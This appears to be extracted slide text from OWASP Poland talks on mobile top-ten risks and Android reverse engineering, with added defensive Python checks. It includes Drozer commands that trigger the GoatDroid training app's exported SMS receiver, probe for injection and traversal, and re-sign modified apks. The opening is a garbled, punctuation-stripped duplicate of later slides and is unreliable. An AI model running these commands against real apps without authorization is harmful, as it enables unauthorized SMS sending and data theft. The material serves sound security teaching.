wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers attacks
Sample manifest from GoatDroid:
<receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
</receiver>
…
<uses-permission android:name="android.permission.SEND_SMS" />
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:
public void onReceive(Context arg0, Intent arg1) {
    context = arg0;
    SmsManager sms = SmsManager.getDefault();
    Bundle bundle = arg1.getExtras();
    // phone number and message are taken straight from the incoming intent
    sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
    Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
}
Sending the intent from Drozer:
run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all the above-mentioned items:
• Setting the android:exported attribute to false (only the current app's own user ID will be able to access the component)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
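A quick static check for the defenses listed above, as an added example that is not from the workshop or the GoatDroid project: given a decoded AndroidManifest.xml (for instance apktool output), it applies the manifest's default export rule (a receiver with an intent-filter is exported unless it says android:exported="false") and flags every reachable receiver that has no android:permission. The manifest string is a constructed sample modelled on the GoatDroid SendSMSNowReceiver shown above; the InternalReceiver, PartnerReceiver and the PARTNER permission name are invented to show the two hardened forms.

```python
"""Static check for exported broadcast receivers without a permission.

Added example; not from the workshop or the GoatDroid project.
The manifest below is a constructed sample: the SendSMSNowReceiver entry is
modelled on the GoatDroid slide, the other two receivers are invented.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def _attr(node, name):
    """Read an android:* attribute (ElementTree stores it with the namespace URI)."""
    return node.get(f"{{{ANDROID_NS}}}{name}")


def is_exported(component) -> bool:
    """Apply the manifest default: an intent-filter implies exported unless denied."""
    explicit = _attr(component, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    return component.find("intent-filter") is not None


def audit_receivers(manifest_xml: str) -> list:
    """Return (receiver name, finding) for receivers that other apps can reach."""
    root = ET.fromstring(manifest_xml)
    findings = []
    for receiver in root.iter("receiver"):
        name = _attr(receiver, "name")
        if not is_exported(receiver):
            continue                      # android:exported="false": first defense
        permission = _attr(receiver, "permission")
        if permission is None:
            findings.append((name, "exported without android:permission"))
        elif permission.startswith("android.permission."):
            # any app can request a normal/dangerous system permission;
            # a custom signature-level permission is the stronger second defense
            findings.append((name, f"exported, guarded only by {permission}"))
    return findings


CONSTRUCTED_MANIFEST = f"""<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="{ANDROID_NS}" package="org.owasp.goatdroid.fourgoats">
  <uses-permission android:name="android.permission.SEND_SMS" />
  <application>
    <!-- vulnerable: intent-filter makes it exported, no permission required -->
    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
      <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
      </intent-filter>
    </receiver>
    <!-- hardened (invented): not exported at all -->
    <receiver android:name=".broadcastreceivers.InternalReceiver" android:exported="false">
      <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.INTERNAL" />
      </intent-filter>
    </receiver>
    <!-- hardened (invented): exported only to holders of a custom permission -->
    <receiver android:name=".broadcastreceivers.PartnerReceiver"
              android:permission="org.owasp.goatdroid.fourgoats.permission.PARTNER">
      <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.PARTNER_EVENT" />
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

if __name__ == "__main__":
    for name, finding in audit_receivers(CONSTRUCTED_MANIFEST):
        print(f"{name}: {finding}")
```

Run it against the manifest apktool decodes from the apk under test; every line it prints is a receiver that the three-step attack above can reach without any permission check on the sender.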
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5
• https://manifestsecurity.com/android-application-security-part-8
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to provide you with basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple-words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in the data stores on the device in an insecure format (plain text or reversible encoding)
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing an application
• Analyze package files at different stages:
  adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the setStorageEncryption method)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
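The checks from the "how to find" and "mitigations" slides, automated over a pulled package directory, as an added example that is not part of the talk. It constructs a small app data tree (a shared_prefs XML with a plaintext password written world-readable, and an SQLite database with a password column; both labelled as constructed) and then does what a tester does after adb pull: lists world-readable files, preference keys that look like secrets, and database columns that look like secrets. The key-name regex is an assumption to tune per application.

```python
"""Scan a pulled /data/data/<package> tree for insecure data storage.

Added example, not from the workshop slides. The app data directory it
scans is constructed inside make_constructed_app_dir().
"""
import os
import re
import sqlite3
import stat
import tempfile
import xml.etree.ElementTree as ET

# Key/column names that usually hold secrets; an assumption to tune per app.
SENSITIVE_KEY = re.compile(r"(pass(word)?|pwd|secret|token|session|pin)", re.I)


def make_constructed_app_dir() -> str:
    """Create a fake app data directory containing the classic mistakes."""
    root = tempfile.mkdtemp(prefix="pkg_")
    prefs_dir = os.path.join(root, "shared_prefs")
    db_dir = os.path.join(root, "databases")
    os.makedirs(prefs_dir)
    os.makedirs(db_dir)
    prefs = os.path.join(prefs_dir, "settings.xml")
    with open(prefs, "w", encoding="utf-8") as f:
        f.write('<?xml version="1.0" encoding="utf-8"?>\n<map>\n'
                '  <string name="username">alice</string>\n'
                '  <string name="password">hunter2</string>\n'
                '  <boolean name="remember_me" value="true" />\n</map>\n')
    os.chmod(prefs, 0o664)  # as if written with MODE_WORLD_READABLE
    db = os.path.join(db_dir, "app.db")
    con = sqlite3.connect(db)
    con.execute("CREATE TABLE users(id INTEGER, login TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'alice', 'hunter2')")
    con.commit()
    con.close()
    os.chmod(db, 0o600)     # private to the app's uid, as it should be
    return root


def world_readable_files(root: str) -> list:
    """Files whose mode grants read access to 'others' (any app on the device)."""
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.stat(path).st_mode & stat.S_IROTH:
                found.append(os.path.relpath(path, root))
    return sorted(found)


def sensitive_prefs(root: str) -> list:
    """(file, key) pairs in shared_prefs whose key looks like a secret."""
    hits = []
    prefs_dir = os.path.join(root, "shared_prefs")
    if not os.path.isdir(prefs_dir):
        return hits
    for name in sorted(os.listdir(prefs_dir)):
        for node in ET.parse(os.path.join(prefs_dir, name)).getroot():
            key = node.get("name", "")
            if SENSITIVE_KEY.search(key):
                hits.append((name, key))
    return hits


def sensitive_db_columns(root: str) -> list:
    """(db, table, column) triples whose column name looks like a secret."""
    hits = []
    db_dir = os.path.join(root, "databases")
    if not os.path.isdir(db_dir):
        return hits
    for name in sorted(os.listdir(db_dir)):
        con = sqlite3.connect(os.path.join(db_dir, name))
        tables = [r[0] for r in con.execute(
            "SELECT name FROM sqlite_master WHERE type='table'")]
        for table in tables:
            for col in con.execute(f'PRAGMA table_info("{table}")'):
                if SENSITIVE_KEY.search(col[1]):
                    hits.append((name, table, col[1]))
        con.close()
    return hits


def scan(root: str) -> dict:
    """All three checks in one report."""
    return {
        "world_readable": world_readable_files(root),
        "prefs": sensitive_prefs(root),
        "db_columns": sensitive_db_columns(root),
    }


if __name__ == "__main__":
    print(scan(make_constructed_app_dir()))
```

Note that adb pull does not preserve the file modes from the device, so on a real target check the permissions with adb shell ls -l on the device and run only the content checks on the pulled copy.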
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple-words definition: the application does NOT implement TLS, or it does so incorrectly
What do you mean "incorrectly"?
• Insecure implementations are:
  – Using known weak protocol versions or ciphers (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the side of the browser
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code:
  if (presented_cert == pinned_cert)
      Start_connection()
  else
      Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
  mallodroid.py -f AppToCheck.apk -d javaout
• Look for end point implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest for a public domain):
  sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
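The two mistakes the Hannover study counted (trusting every certificate, accepting every hostname) next to the correct configuration and the pin check from the "Cert Pinning - theory" slide, as an added example written for this transcript rather than code from the talk or from any of the apps it mentions. Python's ssl module stands in for the platform TLS stack. The DER byte strings are constructed stand-ins for a server certificate and an intercepting proxy's certificate, not real certificates, and the pin here is the SHA-256 of the whole DER certificate (pinning the public key instead works the same way on a different input).

```python
"""Certificate validation and pinning vs. the "trust all" anti-pattern.

Added example (not from the slides). EXPECTED_CERT_DER and ROGUE_CERT_DER
are constructed stand-ins, not real certificates.
"""
import hashlib
import socket
import ssl
from typing import Iterable


def trust_all_context() -> ssl.SSLContext:
    """What the 'trust all certificates' apps effectively do (shown for contrast)."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # the 'accept all hostnames' mistake
    ctx.verify_mode = ssl.CERT_NONE     # the 'trust all certificates' mistake
    return ctx


def strict_context() -> ssl.SSLContext:
    """Chain validation, hostname check and no legacy protocol versions."""
    ctx = ssl.create_default_context()              # loads the system trust store
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2    # rules out SSLv2/SSLv3/TLS 1.0/1.1
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx


def context_is_strict(ctx: ssl.SSLContext) -> bool:
    """The review checklist for a context found in an app, as one predicate."""
    return (ctx.verify_mode == ssl.CERT_REQUIRED
            and ctx.check_hostname
            and ctx.minimum_version >= ssl.TLSVersion.TLSv1_2)


def pin_of(cert_der: bytes) -> str:
    """SHA-256 of the DER certificate, hex; this is the value embedded in the app."""
    return hashlib.sha256(cert_der).hexdigest()


def pin_matches(cert_der: bytes, pinned: Iterable[str]) -> bool:
    """True only if the presented certificate hashes to one of the pinned values."""
    return pin_of(cert_der) in set(pinned)


def connect_pinned(host: str, port: int, pinned: Iterable[str], timeout: float = 5.0) -> bool:
    """Open a TLS connection and report whether the peer certificate is pinned.

    Chain validation happens inside the strict context; the pin check is an
    additional step on top of it, as in the slide's pseudo-code. The caller
    must treat False as 'drop the connection'. Needs network access, so the
    offline checks below do not exercise it.
    """
    ctx = strict_context()
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            presented = tls.getpeercert(binary_form=True)
            return pin_matches(presented, pinned)


# Constructed samples: pretend these are the DER bytes of the real server
# certificate the app was built against and of an intercepting proxy's certificate.
EXPECTED_CERT_DER = b"constructed-der-of-the-real-server-certificate"
ROGUE_CERT_DER = b"constructed-der-of-an-intercepting-proxy-certificate"
PINNED = {pin_of(EXPECTED_CERT_DER)}

if __name__ == "__main__":
    print("expected cert pinned:", pin_matches(EXPECTED_CERT_DER, PINNED))
    print("rogue cert pinned:   ", pin_matches(ROGUE_CERT_DER, PINNED))
    print("trust-all context passes review:", context_is_strict(trust_all_context()))
    print("strict context passes review:   ", context_is_strict(strict_context()))
```

Pin more than one value (the current certificate plus the one prepared for the next rotation), otherwise a routine certificate renewal turns into an outage for every installed copy of the app.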
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple-words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage talks about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakages
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
  dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
  adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple-words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
  dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple-words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in attacker-readable folders or hardcoded within the binary)
• Try to break the encryption algorithm if an application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the passwords to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known, strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on a device. Use password-based encryption instead
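What "password-based encryption instead of a stored key" looks like in code, as an added example for this transcript (not from the talk, NQ Vault or SQLCipher). The first function is the anti-pattern from the two "example" slides: a key that lives in the apk and falls out of dex2jar. The rest derives the database key from the user's password with PBKDF2-HMAC-SHA256 and a random per-install salt, so nothing that is stored on the device is enough to decrypt the data, and adds a MAC-based verifier so the app can distinguish a wrong password from a corrupt database. The iteration count, the label string and the hardcoded sample key are assumptions; the derived key is what you would hand to SQLCipher or a cipher, which is out of scope here.

```python
"""Password-based key derivation instead of a hardcoded key.

Added example (not from the talk). HARDCODED_KEY, the iteration count and
the verifier label are assumptions made for the demo.
"""
import hashlib
import hmac
import os

HARDCODED_KEY = b"s3cr3t-db-key"    # anti-pattern: readable in the decompiled apk

PBKDF2_ITERATIONS = 200_000         # tune to ~100 ms on the slowest supported device
SALT_BYTES = 16
KEY_BYTES = 32


def key_from_hardcoded() -> bytes:
    """Every install shares this key, and the apk itself leaks it."""
    return hashlib.sha256(HARDCODED_KEY).digest()


def new_salt() -> bytes:
    """Random salt generated once per install; safe to store next to the database."""
    return os.urandom(SALT_BYTES)


def derive_key(password: str, salt: bytes, iterations: int = PBKDF2_ITERATIONS) -> bytes:
    """Derive a 256-bit key from the user's password; keep it in memory only."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                               iterations, dklen=KEY_BYTES)


def make_verifier(key: bytes) -> bytes:
    """MAC over a fixed label, stored with the salt, to detect a wrong password."""
    return hmac.new(key, b"db-key-check", hashlib.sha256).digest()


def password_unlocks(password: str, salt: bytes, verifier: bytes) -> bool:
    """Constant-time comparison so the check does not leak through timing."""
    return hmac.compare_digest(make_verifier(derive_key(password, salt)), verifier)


if __name__ == "__main__":
    salt = new_salt()
    key = derive_key("correct horse battery staple", salt)
    verifier = make_verifier(key)
    # Only salt and verifier are persisted; the key is recomputed on each unlock.
    print("unlock with right password:", password_unlocks("correct horse battery staple", salt, verifier))
    print("unlock with wrong password:", password_unlocks("hunter2", salt, verifier))
    print("hardcoded key is the same for every install:", key_from_hardcoded() == key_from_hardcoded())
```

The salt and verifier give an attacker with the pulled files nothing but an offline guessing target whose cost is set by the iteration count, which is the whole point of not having a key on the device.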
M7 - Client side injection
Client side injection – what it is
• Simple-words definition: malicious code can be provided as an input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application, via an intent/content provider
  – A shared file
  – A server response
  – A third party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, running a new activity, etc.) via special objects called Intents:
  Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
  dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
  dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
  dz> run app.package.manifest -a <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows for remote installation of ANY application, while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using Intent filters. Even if the Activity has the attribute exported="false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple-words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
